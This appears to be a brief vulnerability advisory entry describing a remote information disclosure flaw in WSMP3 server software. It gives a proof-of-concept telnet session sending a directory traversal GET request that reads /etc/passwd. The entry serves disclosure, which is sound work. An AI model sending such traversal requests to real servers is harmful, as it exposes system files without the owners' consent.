|
WSMP3 Remote Information Disclosure Vulnerability
No exploit required. However the following proof of concept GET request has been provided: bash$ telnet wsmp3.server.com 8000 Trying 61.37.xxx.xx... Connected to 61.37.xxx.xx. Escape character is '^]'. GET /dir/../../../../../../etc/passwd HTTP/1.0 |
|
|
Privacy Statement |
